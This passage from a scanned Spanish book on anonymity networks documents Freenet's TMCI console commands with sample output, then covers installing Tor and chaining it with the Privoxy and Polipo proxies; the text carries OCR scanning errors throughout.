121.Ill.135.183:2584 0 4rBaZoIDLmN2nlZ2-MhpNKCi2iFuj 4X09OjJT3CckPQ 
0.3871861045979187 CONNECTED 2 
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124.244.165.143:34671 Y~ciaD2SnHR~nlqNIOat2BewsQ9MjnZmiiWOVxVtlQO 
0.39185335794908327 CONNECTED 0 

HAVEPEER 

La ejecucion de este comando devuelve un valor booleano (true/false) indicando si el nodo 
especificado se encuentra dentro de las conexiones existentes en la instancia local. 

TMCI> HAVEPEER:100.3.138.45:32187 
true for 100.3.138.45:32187 

TMCI> HAVEPEER:95.31.20.191:44778 
true for 95.31.20.191:44778 

REMOVEPEER 

Remueve la conexion que se encuentra establecida con el nodo especificado. 

TMCI> REMOVEPEER:100.3.138.45:32187 

Comandos para la gestion de complementos 

Utilizar la herramienta “ FProxy ” es una de las formas mas habituales de gestionar complementos en 
Freenet, sin embargo tambien es posible hacer las mismas operaciones con TMCI y los comandos 
que se indican a continuacion. 

PLUGLIST 

Permite recuperar un listado con todos los complementos que se encuentran cargados en la instancia 
local. 

TMCI> PLUGLIST 

ID: "pplugins-UPnP.UPnP_427433485", Name: class plugins.UPnP.UPnP, Started: Tue 
Sep 22 23:50:51 CEST 2015 

ID: "pplugins.ThawIndexBrowser.ThawIndexBrowser_402466687", Name: class plugins. 
ThawIndexBrowser.ThawIndexBrowser, Started: Tue Sep 22 23:50:51 CEST 2015 
ID: "pplugins.Library.Main_1739278663", Name: class plugins.Library.Main, Started: 
Tue Sep 22 23:50:51 CEST 2015 

ID: "pplugins.floghelper .FlogHelper_2015388471", Name: class plugins-floghelper. 
FlogHelper, Started: Tue Sep 22 23:50:53 CEST 2015 

ID: "pplugins.KeyUtils.KeyUtilsPlugin_1027297100", Name: class plugins.KeyUtils. 
KeyUtilsPlugin, Started: Tue Sep 22 23:50:53 CEST 2015 

ID: "porg.freenetproject.freemail.FreemailPlugin_481411109", Name: class org.free- 
netproject.freemail.FreemailPlugin, Started: Tue Sep 22 23:50:53 CEST 2015 
ID: "pplugins.WebOfTrust.WebOfTrust_76654086", Name: class plugins.WebOfTrust.We- 
bOfTrust, Started: Tue Sep 22 23:50:51 CEST 2015 

PLUGLOAD 

Permite cargar un complemento en el nodo local partiendo del nombre del complemento, un fichero 
en el sistema de archivos, una clave Freenet o una direccion HTTP en Internet. Cada una de estas 
opciones viene definidas por una letra que permite especificar el tipo de carga que se realizara. 

TMCI> PLUGLOAD:O:Freemail 

TMCI> PLUGLOAD:F:/home/adastra/Plugin.j ar 
TMCI> PLUGLOAD:U:/http://dominio.com/Plugin.jar 
TMCI> PLUGLOAD :K:SSK@. 
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PLUGKILL 

Permite detener o descargar un complemento que se encuentra en ejecucion en la instancia local. 
Solamente es necesario indicar el identificador del complemento el cual puede ser consultado con 
el comando PLUGLIST. 

TMCI> PLUGLIST 

ID: "pplugins.UPnP.UPnP_427433485", Name: class plugins.UPnP.UPnP, Started: Tue 
Sep 22 23:50:51 CEST 2015 

ID: "pplugins.ThawIndexBrowser.ThawIndexBrowser_402466687", Name: class plugins. 
ThawIndexBrowser.ThawIndexBrowser, Started: Tue Sep 22 23:50:51 CEST 2015 
ID: "pplugins.Library.Main_1739278663", Name: class plugins.Library.Main, Started: 
Tue Sep 22 23:50:51 CEST 2015 

ID: "pplugins .floghelper. FlogHelper_2015388471", Name: class plugins .floghelper. 
FlogHelper, Started: Tue Sep 22 23:50:53 CEST 2015 

ID: "pplugins.KeyUtils.KeyUtilsPlugin_1027297100", Name: class plugins.KeyUtils. 
KeyUtilsPlugin, Started: Tue Sep 22 23:50:53 CEST 2015 

ID: "porg.freenetproject.freemail.FreemailPlugin_481411109", Name: class org.free— 

netproject.freemail.FreemailPlugin, Started: Tue Sep 22 23:50:53 CEST 2015 

ID: "pplugins.WebOfTrust.WebOfTrust_76654086", Name: class plugins.WebOfTrust.Ke- 

bOfTrust, Started: Tue Sep 22 23:50:51 CEST 2015 

TMCI> PLUGKILL: pplugins .floghelper. FlogHelper_2015388471 

Comandos para gestionar ficheros en Freenet 

Con TMCI tambien es posible subir y consultar contenidos que se encuentran alojados al interior de 
la red, a continuacion se listan algunos de los mas interesantes y utilizados. 

PUTFILE 

Permite subir un fichero que se encuentra ubicado en el sistema de ficheros local de la instancia. 

TMCI> PUTFILE: /home/adastra/file. txt 
Expected hashes 

Compressed data: codec=-l, origSize=45, compressedSize=45 
Completed 0% 0/1 (failed 0, fatally 0, total 1, minSuccessFetch 1) 

Completed 0% 0/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

Completed 0% 0/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) (finalized to¬ 

tal) 

Completed 50% 1/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) (finalized to¬ 
tal) 

Completed 100% 2/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) (finalized to¬ 
tal) 

Attempting to read file /home/adastra/file.txt using MIME type: text/plain 
URI: CHK@6xWCwEp5uSpsb7u7pqlQJpfDORfWo5hLlV8pAc6e38, 
cKBwXQ5ug0sIgPeZUA0O9jv7r816NvY5ut0Et 
4S-zRw, AAIC—8/file. txt 

Upload rate: 0.10816709653072065 bytes / second 

GET 

Permite obtener el contenido de una clave Freenet determinada. 

TMCI>GET:CHK@6xWCwEp5uSpsb7u7pqlQJpfDORfWo5hLlV8pAc6e38,cKBwXQ5ug0sIgPeZUA0O9jv7r8 
16NvY5utOEt4S-zRw,AAIC—8/file.txt 
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Completed 0% 0/1 (failed 0, fatally 0, total 1, minSuccessFetch 0) 

Completed 100% 1/1 (failed 0, fatally 0, total 1, minSuccessFetch 0) 

Expected hashes 

Expected MIME type: text/plain 

Completed 50% 1/2 (failed 0, fatally 0, total 2, minSuccessFetch 0) 

Completed 50% 1/2 (failed 0, fatally 0, total 2, minSuccessFetch 0) (finalized to¬ 
tal) 

CompatibilityMode between 5 and 5 

Completed 100% 2/2 (failed 0, fatally 0, total 2, minSuccessFetch 0) (finalized to¬ 
tal) 

Content MIME type: text/plainData: text file created 

Como se puede ver, tras ejecutar el comando GET sobre una clave existente, se ha podido obtener el 
contenido del fichero y su correspondiente tipo MIME, el cual en este caso es text/plain. 

GETCHKFILE 

Se trata de un comando que se encarga de calcular una clave Freenet valida para un fichero ubicado 
en el sistema de ficheros local. Es un comando similar a PUTFILE en el sentido de que permite 
obtener una clave CHK de Freenet sobre un fichero de texto, pero en este caso, el comando no sube 
dicho fichero a la red de Freenet. 

TMCI> GETCHKFILE:/home/adastra/logsFile 
Expected hashes 

Compressed data: codec=-l, origSize=5208, compressedSize=5208 
Completed 0% 0/1 (failed 0, fatally 0, total 1 , minSuccessFetch 1) 

Completed 0% 0/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

Completed 50% 1/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

Completed 100% 2/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

Completed 100% 2/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) (finalized to¬ 
tal) 

Attempting to read file /home/adastra/logsFile using MIME type: application/octet- 
stream 

URI: CHK@o8gZxWozuCle4~lHI jpmKAzT4s9-XNPAs9 JW10a4fik,cnOMgmMIhWt3QOU7sEKxii6VauKoTI 

zHxrFMFkfObQO,AAIC—8/logsFile 

Upload rate: 473454.54545454547 bytes / second 

DUMP 

Es equivalente al comando GET, sin embargo permite recuperar informacion adicional sobre el 
fichero y los metadatos de la clave especificada. 

TCMI>DUMP:CHK@6xWCwEp5uSpsb7u7pqlQJpfDORfWo5hLlV8pAc6e38, 

cKBwXQ5ug0sIgPeZUA0O9jv7r816NvY5u 

t0Et4S-zRw, AAIC—8/file. txt 

Completed 0% 0/1 (failed 0, fatally 0, total 1, minSuccessFetch 0) 

Completed 100% 1/1 (failed 0, fatally 0, total 1, minSuccessFetch 0) 

Expected hashes 

Expected MIME type: text/plain 

Completed 50% 1/2 (failed 0, fatally 0, total 2, minSuccessFetch 0) 

Completed 50% 1/2 (failed 0, fatally 0, total 2, minSuccessFetch 0) (finalized to¬ 
tal) 

CompatibilityMode between 5 and 5 

Completed 100% 2/2 (failed 0, fatally 0, total 2, minSuccessFetch 0) (finalized tc- 









140 


Deep Web: TOR, FreeNET & I2P - Privacidady Anonimato 


tal) 

Content MIME type: text/plainData: 

text file created to test the TCMI Client... 

PUTDIR 

Se trata de un comando que permite subir un directorio completo con sus correspondientes contenidos 
a la red de Freenet. 

TMCI> PUTDIR:/home/adastra/FreeNetDir 
Expected hashes 

Compressed data: codec=-l, origSize=10240, compressedSize=10240 
Completed 0% 0/1 (failed 0, fatally 0, total 1, minSuccessFetch 1) 

Completed 0% 0/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

Completed 50% 1/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

Completed 100% 2/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

CHK@4Blu3Wh8uatLfvDEaPx5q63z7CCWqEg3CbbWpA70UgQ,iLoqee8BJsLSd3- 
DMoWeY 6UiJOOaDeBxICZKglXlyyY,AAIC— 

GETCHKDIR 

Es equivalente al comando GETCHKFILE, con la diferencia de que se encarga de calcular la clave 
que retomarla la instancia de Freenet a la hora de subir un directorio en la red. Del mismo modo que 
ocurre con GETCHKFILE no sube el directorio a la red, solamente calcula la clave CHK que se le 
asignaria si este directorio se subiera. 

TCMI>GETCHKDIR :/home/adastra/FreeNetDir 
Expected hashes 

Compressed data: codec=-l, origSize=10240, compressedSize=10240 
Completed 0% 0/1 (failed 0, fatally 0, total 1, minSuccessFetch 1) 

Completed 0% 0/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

Completed 50% 1/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

Completed 100% 2/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

CHK@4Blu3Wh8uatLfvDEaPx5q63z7CCWqEg3CbbWpA70UgQ,iLoqee8BJsLSd3- 
DMoWeY6UiJOOaDeBxICZKglXlyyY,AAIC— 

8 /============================== = = = === = == === = == 

Comandos para la gestion de claves de Freenet 

TMCI tambien cuenta con algunos comandos que permiten la gestion de todos los tipos de claves 
disponibles en Freenet. Algunos de dichos comandos se explican a continuacion: 

MAKESSK 

Permite la creacion de un nuevo par de claves SSK, las cuales pueden ser utilizadas posteriormente 
para la creacion de un nuevo sitio web. 

TMCI> MAKESSK 

Insert URI: SSK@AJ51ZR76XmLjvexlmY-07flV5UAVU15YtLd-plrsYCY6,5- 
ntAo5GYvbEEMlk97NdgkWPuznT-tfJdwAVODlmc-8,AQECAAE/ 

Request URI: SSK@Xt7qGKwgSJ5vFA4nS19i537nStzvLc5Qojl7cqAEAGI,5- 
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ntAo5GYvbEEMlk97NdgkWPuznT-tfJdwAVODlmc-8,AQACAAE/ 

Note that you MUST add a filename to the end of the above UKLs e.g.: 

SSK0AJ51ZR7 6XmLjvexlmY-07flV5UAVU15YtLd-plrsYCY6,5- 
ntAo5GYvbEEMlk97NdgkWPuznT-tfJdwAVODlmc-8,AQECAAE/testsite 

Normally you will then do PUTSSKDIR:cinsert URI>#<directory to upload>, for exam¬ 
ple : 

PUTSSKDIR:SSK0AJ51ZR76XmLjvexlmY-07flV5UAVU15YtLd-plrsYCY6, 5- 

ntAo5GYvbEEMlk97NdgkWPuznT-tfJdwAVODlmc-8, AQECAAE/testsite#directoryToUpload/ 

This will then produce a manifest site containing all the files, the default docu¬ 
ment can be accessed 
at 

SSK@Xt7qGKwgSJ5vFA4nS19i537nStzvLc5Qoj17cqAEAGI, 5- 
ntAo5GYvbEEMlk97NdgkWPuznT-tfJdwAVODlmc-8,AQACAAE/testsite/ 

Tras la ejecucion del comando MAKESSK se han generado las dos partes correspondientes a la 
clave SSK, la cual desde este momenta se encuentra preparada para ser utilizada. Por otro lado, 
tambien se incluyen algunas indicaciones sobre como puede ser empleada para crear un sitio web. 
Es importante anotar que el comando ha dado como resultado una clave publica y otra privada, 
en donde la clave privada sera utilizada para subir los ficheros que haran parte del sitio web y la 
clave publica sera entregada a los visitantes de dicho sitio, los cuales podran consultarlo utilizando 
“ FProxy Evidentemente la clave privada debe permanecer secreta y solamente la debe conocer el 
administrador del sitio, mientras que la clave publica debe ser distribuida entre los usuarios para que 
puedan acceder al servicio. 

PUTSSKDIR 

Este comando permite subir directorios a la red de Freenet vinculandolos con una clave SSK 
previamente creada. Recibe como argumentos la clave privada SSK y el directorio que se desea 
subir. 

TMCI> PUTSSKDIR:SSK0AJ51ZR7 6XmLj vexlmY-07flV5UAVU15YtLd-plrsYCY6,5- 

ntAo5GYvbEEMlk97NdgkWPuznT-tfJdwAVODlmc-8,AQECAAE/AdastraTestTMCI#/home/adastra/ 

directory/ 

Started compression attempt with GZIP 
Expected hashes 

Compressed data: codec=0, origSize=10240, compressedSize=214 
Completed 0% 0/1 (failed 0, fatally 0, total 1, minSuccessFetch 1) 

Completed 0% 0/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

Completed 50% 1/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

Completed 100% 2/2 (failed 0, fatally 0, total 2, minSuccessFetch 2) 

SSK@Xt7qGKwgSJ5vFA4nS19i537nStzvLc5Qojl7cqAEAGI,5- 
ntAo5GYvbEEMlk97NdgkWPuznT-tfJdwAVODlmc- 

8,AQACAAE/Ada s traTe stTCMI/============================================== 


Como se puede apreciar la sintaxis del comando anterior consta de los siguientes elementos: 

PUTSSKDIR:<CLAVE_SSK>/<NOMBRE_SITIO>#DIRECTORIO_SUBIR 

El resultado de la operacion anterior es la clave SSK publica con el sitio web que otros usuariospodran 
visitar. Por otro lado, una forma comoda y rapida de consultar dicha clave desde “FProxy ” es 
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utilizando la utilidad “Key Explorer” que se encuentra incluida en el menu “Key Utils —► Site 
Explorer” o en “Key Utils —> Key Explorer”. 

TMCI es la mejor altemativa que puede emplear un usuario a la hora de gestionar todos los detalles 
de una instancia de Freenet sin necesidad de instalar un gestor de ventanas en el sistema, algo que 
suele ser poco habitual en servidores y entomos productivos. 
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Capitulo IV 

Tor (The Onion Router) 


4.1 Introduccion 

Tor es una red anonima que se encuentra soportada y gestionada por el equipo de Tor Project liderado 
por Roger Dingledine, autor de multiples trabajos de investigation sobre privacidad y anonimato 
desde el ano 2000, uno de los principales precursores de las soluciones de anonimato modemas. Tor 
ha ido creciendo de forma continua desde que se creo el proyecto el ano 2003 y actualmente cuenta 
con miles de voluntarios en todo el mundo que usan la red y aportan ancho de banda para mejorar 
su desempeno. 

A diferencia de I2P y FreeNet, Tor es una red completamente centralizada, en la que un conjunto de 
servidores se encargan de gestionar todos los detalles de configuracion, asi como aportar estadisticas 
generales sobre el uso de la red. Dichos servidores son conocidos como “directory authorities ” o 
autoridades de directorio y una de las funciones mas importantes que realizan es la generation 
de un consenso que contiene informacion sobre los repetidores que conforman la red de Tor. Los 
consensos son generados automaticamente cada hora y reflejan el estado de los repetidores admitidos 
para ser utilizados por los clientes en sus circuitos. Antes de continuar con una explication mucho 
mas detallada sobre el funcionamiento de Tor, es necesario comprender correctamente el significado 
de algunos terminos comunes y algunas otras cuestiones basicas que se describen en los siguientes 
apartados. 


4.1.1 Instalacion y configuracion de una instancia de Tor 

Tor es un servicio orientado al establecimiento de comunicaciones anonimas utilizando una serie de 
nodos conectados los cuales en su conjunto son conocidos como “circuito virtual”. Tales nodos se 
remover capas de cifrado en los paquetes que viajan por medio de ellos utilizando el protocolo de Tor, 
de esta forma se enmascara el origen de la petition cuando es entregada a su correspondiente destino, 
sin embargo, el unico protocolo soportado es TCP, por este motivo cuando se utilizan peticiones con 
un protocolo diferente como UDP o ICMP, dichas peticiones no pasan por medio del circuito virtual y 
en lugar de ello se establece una conexion directa entre el cliente y destino, produciendo de esta forma 
lo que se conoce como “leaks” o fugas de informacion que pueden arruinar el anonimato del usuario. 
Esta es una de las consideraciones que se debe tener en cuenta a la hora de utilizar esta red, sin embargo 
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no es la unica y a lo largo de presente capltulo se ira profundizando sobre todas estas cuestiones. 
El proceso de instalacion de una instancia de Tor puede realizarse de dos maneras, o bien utilizando 
el proyecto conocido como “Tor Browser ” o por medio del software de Tor. 

4.1.1.1 Tor Browser 

Con Tor Browser el usuario tiene la ventaja de que no es necesario instalar software adicional y 
todo lo que necesita para comenzar a utilizar Tor viene empaquetado en un iinico fichero ejecutable, 
ademas tambien cuenta con el navegador web oficial del proyecto, el cual esta basado en Firefox y 
se encuentra disenado especlficamente para utilizar Tor y configurar diferentes niveles de anonimato 
y privacidad. Se puede descargar desde el sitio web oficial en el siguiente enlace https://www. 
torproject.org/download/download-easy.html.en y como se puede apreciar, existen versiones para 
diferentes sistemas operativos y arquitecturas de ordenadores. Una vez descargado y descomprimido 
el paquete correspondiente, el usuario puede ejecutar el script “ start-tor-browser.desktop ” el cual se 
encarga de iniciar una instancia de Tor y posteriormente el navegador web “Tor Browser". 



Imogen 04.01: Tor Browser instalado. 


Actualmente, Tor Browser es el sustituto de Vidalia, otro proyecto que file bastante popular y 
utilizado junto con Tor pero que debido a la potencia del navegador Tor Browser y su facilidad de 
uso y configuration, es el proyecto que se distribuye de manera oficial para integrarse y comenzar 
a utilizar Tor rapidamente. Por otro lado, Tor Browser cuenta con el complemento “ TorButton ” el 
cual permite configurar la instancia de Tor que se arranca con Tor Browser y ver detalles sobre los 
circuitos construidos cuando se navega por Internet. 

4.1.1.2 Instalacion de una instancia de Tor 

Es posible que el usuario quiera ejecutar el software como un servicio, por ejemplo, en el caso de 
configurar servicios ocultos o repetidores y en tal caso, se puede instalar Tor partiendo de la version 
disponible en los repositories de sistemas basados en Debian utilizando el comando "apt-get" o 
descargar la ultima version desde el sitio web oficial en el siguiente enlace: https://www.torproject. 
org/ download/download 
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Antes de compilary generar el ejecutable del programa es necesario tener instaladas las dependencias, 
que en concreto son “ libevent-dev ” y “ libssl-dev ”. Una vez cumplidas dichas dependencias y 
teniendo un compilador para programas escritos en C (como por ejemplo el GCC) se puede proceder 
a ejecutar los comandos correspondientes a la compilation y creation del ejecutable. 


>. / configure 
>make 

>src/or/tor 

Sep 25 22:33:57.795 [notice] Tor v0.2.6.10 (git-58c51dc6087b0936) running on Linux 
with Libevent 2.0.21-stable, OpenSSL 1.0.If and Zlib 1.2.8. 

Sep 25 22:33:57.795 [notice] Tor can't help you if you use it wrong! Learn how to 
be safe at https://www.torproject.Org/download/download#warning 

Sep 25 22:33:57.811 [notice] Configuration file "/usr/local/etc/tor/torrc" not pre¬ 
sent, using reasonable defaults. 

Sep 25 22:33:57.817 [notice] Opening Socks listener on 127.0.0.1:9050 

[notice] Parsing GEOIP IPv4 file /usr/local/share/tor/geoip. 
[notice] Parsing GEOIP IPv6 file /usr/local/share/tor/geoip6. 
[notice] Bootstrapped 0%: Starting 

[notice] Bootstrapped 5%: Connecting to directory server 
[notice] Bootstrapped 10%: Finishing handshake with directory 


Sep 25 22:33:57.000 
Sep 25 22:33:57.000 
Sep 25 22:33:57.000 
Sep 25 22:33:59.000 
Sep 25 22:35:59.000 
server 

Sep 25 22:35:59.000 

connection 

Sep 25 22:35:59.000 

Sep 25 22:35:59.000 

Sep 25 22:36:00.000 

Sep 25 22:36:00.000 


[notice] Bootstrapped 15%: Establishing an encrypted directory 


[notice] Bootstrapped 20%: Asking for networkstatus consensus 
[notice] Bootstrapped 25%: Loading networkstatus consensus 
[notice] Bootstrapped 45%: Asking for relay descriptors 
[notice] I learned some more directory information, but not 
enough to build a circuit: We need more microdescriptors: we have 9/6541, and can 
only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% 
of exit bw = 0% of path bw.) 

Sep 25 22:36:00.000 [notice] Bootstrapped 50%: Loading relay descriptors 
Sep 25 22:36:00.000 [notice] I learned some more directory information, but not 
enough to build a circuit: We need more microdescriptors: we have 9/6541, and can 
only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% 
of exit bw = 0% of path bw.) 

Sep 25 22:36:01.000 [notice] Bootstrapped 57%: Loading relay descriptors 

Sep 25 22:36:01.000 [notice] Bootstrapped 65%: Loading relay descriptors 

Sep 25 22:36:01.000 [notice] I learned some more directory information, but not 

enough to build a circuit: We need more microdescriptors: we have 4541/6541, and 

can only build 32% of likely paths. (We have 68% of guards bw, 68% of midpoint bw, 

and 69% of exit bw = 32% of path bw.) 

Sep 25 22:36:01.000 [notice] Bootstrapped 73%: Loading relay descriptors 

Sep 25 22:36:02.000 [notice] Bootstrapped 80%: Connecting to the Tor network 

Sep 25 22:36:02.000 [notice] Bootstrapped 90%: Establishing a Tor circuit 
Sep 25 22:36:02.000 [notice] Tor has successfully opened a circuit. Looks like 
client functionality is working. 

Sep 25 22:36:02.000 [notice] Bootstrapped 100%: Done 


Con estos sencillos comandos se generara el ejecutable del programa en el directorio “ src/or ”. Este 
procedimiento es especialmente recomendable cuando se debe instalar el software de Tor sobre un 
servidor dedicado que no tiene ningun tipo de gestor de ventanas, con lo cual el uso de Tor Browser 
en tal caso no aplicaria. 
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A efectos practicos no hay mayores diferencias entre estos metodos de instalacion ya que en ambos 
casos se levantara una instancia de Tor con las opciones configuracion que se indiquen en el fichero 
de configuracion maestro, las cuales evidentemente es necesario comprender muy bien para poder 
gestionar correctamente una instancia de Tor, algo que se vera detalladamente en las siguientes 
secciones de este capltulo. 


4.1.2 Instalacion de Privoxy con Tor 

Privoxy es un programa que funciona como proxy web con capacidades de filtrado y mejora la 
privacidad del usuario, permite controlar el acceso a information personal y filtrar ADS en sitios 
en Internet que pueden representar una amenaza para la privacidad. El procedimiento de instalacion 
puede llevarse a cabo desde codigo fuente o utilizando algun paquete preconfigurado en los 
repositorios de distribuciones como Debian o CentOS. En el caso de instalar el software desde codigo 
fuente, se debe descargar la ultima version disponible desde el siguiente enlace: http://sourceforge. 
net/projects/ijbswa/files/. Posteriormente se procede a ejecutar las siguientes instrucciones para 
compilar y posteriormente generar el programa ejecutable. 

>autoheader && autoconf 

>./configure —disable-toggle —disable-editor —disable-force 
>raake 

>make -n install 

En el caso de instalar Privoxy utilizando una version preconfigurada desde algun repositorio de 
distribuciones basadas en Linux, es ffecuente encontrar el fichero de configuracion de Privoxy en “/ 
etc/privoxy/config' , . En el caso de instalar Privoxy desde codigo fuente, el fichero de configuracion 
se encuentra incluido en el directorio ralz del programa. 

Con Privoxy correctamente instalado y configurado, ahora es posible indicarle que las peticiones 
entrantes deben de ser redirigidas al proxy SOCKS de Tor, el cual por defecto se inicia en el puerto 
“9150” cuando se utiliza Tor Browser y en el puerto “9050” cuando se inicia Tor como servicio 
sin utilizar Tor Browser. Para hacer esto, se debe editar el fichero de configuracion de Privoxy 
incluyendo la siguiente instruction: 

forward-socks5t / 127.0.0.1:9050 . 

Con esta configuracion se le indica a Privoxy que todas peticiones entrantes por puerto “8118” 
(puerto por defecto de Privoxy) seran enviadas al puerto “9050” en la maquina local, en donde se 
encontrara en ejecucion la instancia de Tor. 


4.1.3 Instalacion de Polipo con Tor 

Es bastante comun configurar Privoxy para conectar con una instancia de Tor tal como se ha visto 
en el apartado anterior, sin embargo Privoxy no es la unica alternativa y existen otras soluciones 
con caracteristicas que aportan algunos beneficios adicionales, tal es el caso de Polipo. Se trata 
de un proxy web diseiiado para ser liviano y rapido en entomos de red donde la velocidad de la 
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conexion es lenta, se integra bastante bien con instancias de Tor y tal como se lista a continuacion, 
las caracteristicas mas sobresalientes de este software son las siguientes: 

- Soporte completo “ pipelines ” en HTTP/1.1: En la especificacion del protocolo HTTP 
1.1, el concepto de “ pipelines ” consiste en aprovechar las conexiones persistentes para 
implementar flujos de peticiones, de esta forma es posible enviar multiples peticiones a un 
destino sin la necesidad de esperar respuestas y sin perder ningun paquete de datos en dicho 
proceso. Por otro lado, tambien permite que multiples peticiones sean enviadas en un solo 
paquete, lo que reduce la latencia y el trafico en la red. Sin embargo, hay que tener en cuenta 
que algunos servidores web que se encuentran disponibles en el mercado soportan HTTP 
1.1 de forma parcial y muchas de las caracteristicas del protocolo no estan completamente 
integradas. Por este motivo Polipo utilizara pipelines solamente si considera que el servidor 
remoto lo soporta. 

- Soporte w r eb cache: Polipo tambien intenta cachear el segmento inicial de una peticion, de 
esta forma es facilmente retomada en el caso de que exista una interrupcion en la misma, por 
ejemplo cuando una descarga es interrumpida, permitira retomarla posteriormente partiendo 
de la cache. 

- Polipo intentara actualizar las peticiones a HTTP 1.1 aunque desde el cliente vengan con 
HTTP 1.0, dependiendo evidentemente de las capacidades del servidor web. Tambien podria 
asignar una version del protocolo mas baja. 

- Polipo soporta IPv6. 

- Polipo puede utilizar una tecnica conocida como Poor Man’s Multiplexing (PMM) 
que consiste en la simulacion de multiples peticiones sobre transacciones simultaneas 
compartiendo una unica conexion, algo que en el protocolo HTTP no esta soportado, de esta 
forma se reduce considerablemente la latencia y el trafico en la red. Para que esta tecnica 
fimcione adecuadamente debe existir soporte a pipelines en el servidor. 

Para instalar Polipo existen dos altemativas, se puede descargar la ultima version estable desde 
el sitio web oficial ubicado en el siguiente enlace: http://freehaven.net/~chrisd/polipo/ o se puede 
clonar el repositorio repositorio GIT con la ultima version en estado de desarrollo del programa, el 
cual se encuentra ubicado en la siguiente direction: https://github.com/jech/polipo 

Dado que es un programa escrito en lenguaje C, es necesario construir y generar el ejecutable. 

>make all 
>make install 

Con esto es suficiente para que Polipo quede correctamente instalado en la maquina. Ahora es 
necesario establecer las propiedades de configuracion adecuadas y para ello, se debe crear el fichero 
de configuracion maestro con el nombre “ config ”, el cual se puede ubicar en el directorio “~/ polipo" 
o en ‘Vetc/polipo/”. El contenido de dicho fichero puede ser el siguiente: 

socksParentProxy = localhost:9050 

diskCacheRoot="" 

disableLocalInterface=true 





148 


Deep Web: TOR, FreeNet & I2P - Privacidady Anonimato 


laxHttpParser=true 

maxPipelineTrain=15 

socksProxyType=socks5 

Con la configuracion anterior y el proxy SOCKS de Tor esperando conexiones por el puerto “9050”, 
ahora se puede iniciar Polipo. Opcionalmente, se puede indicar la rata donde se encuentra el fichero 
de configuracion maestro, para ello se incluye el interraptor “-c”. 

./polipo -c "/etc/polipo/config" 

Established listening socket on port 8123. 

Para verificar que el funcionamiento es correcto, se puede configurer cualquier navegador web 
para que utilice el proxy SOCKS de Polipo, el cual por defecto se vincula con el puerto “8123” 
y posteriormente, dirigirse al servicio https://check.torproject.org para verificar si el cliente esta 
utilizando correctamente Tor. 



Imogen 04.02: Verficando el correcto funcionamiento de Polipo y Tor.w 


Como se puede ver en la imagen 04.02, el navegador utiliza Polipo como servidor proxy y al verificar 
si se encuentra configurado para utilizar Tor, el servicio de chequeo determina que la petition se 
ha realizado por medio de uno de los repetidores de salida registrados en la red, con lo cual la 
configuracion entre Polipo y Tor se encuentra correctamente establecida. 

Desventajas y Beneficios de Polipo frente a Privoxy 

Polipo y Privoxy los principals servidores proxy que se pueden integrar bastante bien con Tor, no 
obstante tienen varias diferencias que se detallan a continuation: 

- Polipo suele ser mas eficiente que Privoxy debido al soporte que tiene sobre cache de 
sitios web y pipelines de conexiones, propiedades propias del protocolo HTTP 1.1, algunas 
de las cuales no estan completamente soportadas en Privoxy. 
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- Privoxy esta mejor disenado para asegurar el anonimato en determinados sitios web que 
utilizan JavaScript y filtrar cabeceras HTTP en la peticion que pudieran ser utilizadas para 
obtener informacion del usuario. Privoxy realiza una mejor depuracion de los documentos 
HTML y contenidos con Javascript. 

- A diferencia de Polipo, Privoxy no es capaz de manejar conexiones persistentes. 

- Privoxy no tiene la capacidad de actuar como un servidor web de cache para acelerar 
la navegacion por sitios, sin embargo esta caracteristica esta completamente soportada en 

Polipo. 

- Privoxy puede realizar sustituciones de texto sobre las peticiones web, aunque esta 
caracteristica no se encuentra activa por defecto y es necesario especificar manualmente e 
filtro “fun" para ver que textos como “ Microsoft ” son cambiados por “ Microsucks' . Este tipo 
de tratamientos sobre las peticiones no son posibles con Polipo. 

Ahora bien, para fortalecer la privacidad y anonimato, un usuario puede optar por utilizar ambos 
servidores proxy encadenando las peticiones de la siguiente forma: 

Privoxy:8118 » Polipo:8123 - Tor:9050 

Privoxy recibira las peticiones realizadas por el cliente en el puerto “8118” y postenormente, 
dichas peticiones seran redirigidas al puerto “8123”, en donde estara Polipo esperando conexiones. 
Finalmente, Polipo se encargara de realizar la redirection de la peticion al puerto 9050 en on e 
debe encontrarse una instancia de Tor en ejecucion. En el fichero de configuracion de Privoxy se 
establece la siguiente configuracion: 

forward-socks5 / 127.0.0.1:8123 . 

Y finalmente, el fichero de configuracion de Polipo tendra los mismos contenidos que se han 
ensenado unos parrafos mas arriba. 


4.1.4 La web profunda de Tor 

Los repetidores que se encuentran disponibles en Tor no solamente suelen ser utilizados para acceder 
de forma anonima a servicios que se encuentran disponibles en Internet, sino que tambien en algunos 
casos son utilizados para enrutar las peticiones a servicios que se encuentran alojados al interior de 
la red, todos estos servicios en su conjunto constituyen lo que se conoce como la web profunda de 
Tor. Este espacio ha recibido varias denominaciones, tales como darknet o cypher net e i o a 
sus particulares caracteristicas. 

En la web profunda de Tor existe un numero indeterminado de servicios ocultos de todo tipo, 
desde aplicaciones web hasta servidores SSH. Un servicio oculto puede ser de cualquier tipo, pero 
necesariamente tiene que basarse en el protocolo TCP, cualquier tipo de servicio basado en un 
protocolo distinto no puede ser desplegado sobre la red. 

Por otro lado, no existe un mecanismo centralizado para la resolution de nombres de dominio, 
no existen servicios similares a DNS para resolver dominios a direcciones IP o viceversa y en su 
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lugar, tal como se vera mas adelante en este capitulo cuando se describan los detalles tecnicos de 
la arquitectura de la red, existe una tabla distribuida del tipo hash compuesta por varios servidores 
“ HSDir ” que mantienen el registro de todos los servicios ocultos con sus correspondientes 
direcciones. 

4.1.4.1 Servicios ocultos para comenzar a descubrir la web profunda de Tor 

